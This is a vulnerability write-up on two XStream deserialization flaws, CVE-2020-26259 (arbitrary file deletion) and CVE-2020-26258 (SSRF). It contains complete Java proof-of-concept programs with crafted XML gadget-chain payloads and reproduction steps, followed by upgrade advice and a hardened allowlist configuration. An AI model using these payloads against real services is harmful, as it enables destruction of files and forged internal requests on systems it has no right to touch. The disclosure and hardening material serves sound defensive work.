1. Vulnerability description
XStream is a widely used Java library for converting Java objects to XML and back. On a service that runs XStream, an unauthenticated remote attacker who can supply crafted serialized data can cause arbitrary file deletion or server-side request forgery (SSRF).
2. Affected versions
XStream <= 1.4.14
3. Vulnerability PoC
1) CVE-2020-26259: arbitrary file deletion
import com.thoughtworks.xstream.XStream;

/*
 * CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host
 * when unmarshalling as long as the executing process has sufficient rights.
 * https://x-stream.github.io/CVE-2020-26259.html
 *
 * Running this prints the following warning, because no allowlist was configured:
 * "Security framework of XStream not explicitly initialized, using predefined black list on your own risk."
 */
public class cve_2020_26259 {
    public static void main(String[] args) {
        // The tempFile element names the file that is deleted when the FileStream is closed.
        String xml_poc = "<map>\n" +
            "  <entry>\n" +
            "    <jdk.nashorn.internal.objects.NativeString>\n" +
            "      <flags>0</flags>\n" +
            "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
            "        <dataHandler>\n" +
            "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
            "            <contentType>text/plain</contentType>\n" +
            "            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\n" +
            "              <tempFile>D:/test.txt</tempFile>\n" +
            "            </is>\n" +
            "          </dataSource>\n" +
            "          <transferFlavors/>\n" +
            "        </dataHandler>\n" +
            "        <dataLen>0</dataLen>\n" +
            "      </value>\n" +
            "    </jdk.nashorn.internal.objects.NativeString>\n" +
            "    <string>test</string>\n" +
            "  </entry>\n" +
            "</map>";
        // Default XStream instance: no explicit security framework, so the blacklist is used.
        XStream xstream = new XStream();
        xstream.fromXML(xml_poc);
    }
}
2) CVE-2020-26258: server-side request forgery (SSRF)
import com.thoughtworks.xstream.XStream;
import java.io.IOException;

public class cve_2020_26258 {
    public static void main(String[] args) throws IOException {
        // The url element is fetched by URLDataSource while the object graph is restored.
        String payload = "<map>\n" +
            "  <entry>\n" +
            "    <jdk.nashorn.internal.objects.NativeString>\n" +
            "      <flags>0</flags>\n" +
            "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
            "        <dataHandler>\n" +
            "          <dataSource class='javax.activation.URLDataSource'>\n" +
            "            <url>http://127.0.0.1:8000/ntuser.ini</url>\n" +
            "          </dataSource>\n" +
            "          <transferFlavors/>\n" +
            "        </dataHandler>\n" +
            "        <dataLen>0</dataLen>\n" +
            "      </value>\n" +
            "    </jdk.nashorn.internal.objects.NativeString>\n" +
            "    <string>test</string>\n" +
            "  </entry>\n" +
            "</map>";
        // Default XStream instance: no explicit security framework, so the blacklist is used.
        XStream xStream = new XStream();
        xStream.fromXML(payload);
    }
}
4. Reproduction
1) Download XStream 1.4.10 from https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.10-java7/
2) In your IDE, create a Maven project named xstream. A pom.xml is generated; replace its contents with the following:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.example</groupId>
    <artifactId>xstream</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.14</version>
        </dependency>
    </dependencies>
</project>
3) Place the downloaded xstream file in the xstream project directory.
4) Select the java folder in the project tree, right-click -> New -> Java Class, name it cve_2020_26258, and paste in the cve_2020_26258 PoC.
5) Run python3 -m http.server 8000 to start a local server on port 8000. In the IDE, right-click and choose Run 'cve_2020_26258.main()'; the local server receives a request for the ntuser.ini file named in the PoC.
6) Create cve_2020_26259 and paste in the cve_2020_26259 PoC.
7) In the IDE, right-click and choose Run 'cve_2020_26259.main()'; the file test.txt on drive D: is deleted.
5. Remediation
Upgrade XStream. For a Maven-managed project, change the xstream version in the pom.xml dependency to 1.4.15. For projects managed another way, download the release from the official site.
Download page: http://x-stream.github.io/download.html
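Upgrading is the fix, but both PoCs in section 3 only work because the XStream instance was created with `new XStream()` and no security framework, so XStream falls back to its predefined blacklist (the warning quoted in the PoC comment). The following is an added example, not code from this write-up or from the XStream project, showing the allowlist configuration XStream's own advisories recommend: start from "deny every type", then allow only the application's model classes. The class `HardenedXStream`, the model class `Greeting`, the alias `greeting` and the wildcard package `com.example.model.**` are assumptions for illustration. With this setup, the `<map>` / `jdk.nashorn.internal.objects.NativeString` structure used by both PoCs is rejected at type resolution, before any DataHandler or DataSource is ever instantiated.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

/*
 * Added example (not from the original write-up): an XStream instance that
 * only unmarshals an explicit allowlist of types. Everything not listed,
 * including java.util.HashMap ("map") and the JDK gadget classes used by
 * CVE-2020-26258 / CVE-2020-26259, is refused with an exception.
 */
public class HardenedXStream {

    /** Hypothetical application model class; the only thing we expect in the XML. */
    public static class Greeting {
        public String text;
    }

    public static XStream createHardenedXStream() {
        XStream xstream = new XStream();
        // 1. Drop every permission, including the blacklist-based defaults.
        xstream.addPermission(NoTypePermission.NONE);
        // 2. Re-allow the harmless basics: null, primitives and their wrappers, String.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[]{String.class});
        // 3. Allow only the application's own model types (hypothetical names).
        xstream.allowTypes(new Class[]{Greeting.class});
        xstream.allowTypesByWildcard(new String[]{"com.example.model.**"});
        // 4. Use an alias so documents never carry fully qualified class names.
        xstream.alias("greeting", Greeting.class);
        return xstream;
    }

    /**
     * Unmarshals untrusted XML. Returns null if XStream refused a type:
     * a ForbiddenClassException for the root element, or a ConversionException
     * wrapping one for a nested element; both extend XStreamException.
     */
    public static Object unmarshalUntrusted(XStream xstream, String xml) {
        try {
            return xstream.fromXML(xml);
        } catch (XStreamException e) {
            // Log and reject; do not fall through to the blacklist behaviour.
            System.err.println("Rejected untrusted XML: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        XStream xstream = createHardenedXStream();

        // Constructed benign input matching the allowlist.
        String benign = "<greeting><text>hello</text></greeting>";
        Greeting g = (Greeting) unmarshalUntrusted(xstream, benign);
        System.out.println("benign input: " + (g == null ? "rejected" : "ok, text=" + g.text));

        // Constructed hostile input: the outer structure both PoCs rely on, with
        // the DataHandler gadget chain omitted; the root "map" alone is already refused.
        String hostile = "<map><entry>"
            + "<jdk.nashorn.internal.objects.NativeString><flags>0</flags>"
            + "</jdk.nashorn.internal.objects.NativeString>"
            + "<string>test</string></entry></map>";
        Object o = unmarshalUntrusted(xstream, hostile);
        System.out.println("hostile input: " + (o == null ? "rejected" : "ACCEPTED (misconfigured!)"));
    }
}
```

On XStream 1.4.10 through 1.4.17, `XStream.setupDefaultSecurity(xstream)` gives an equivalent "deny all, allow basics" starting point; with it the runtime warning quoted in the PoC comment no longer appears, which is a quick way to spot instances that still rely on the blacklist. Pair the allowlist with the version upgrade rather than using it instead of one: the blacklist in 1.4.14 and earlier is exactly what these two CVEs bypass.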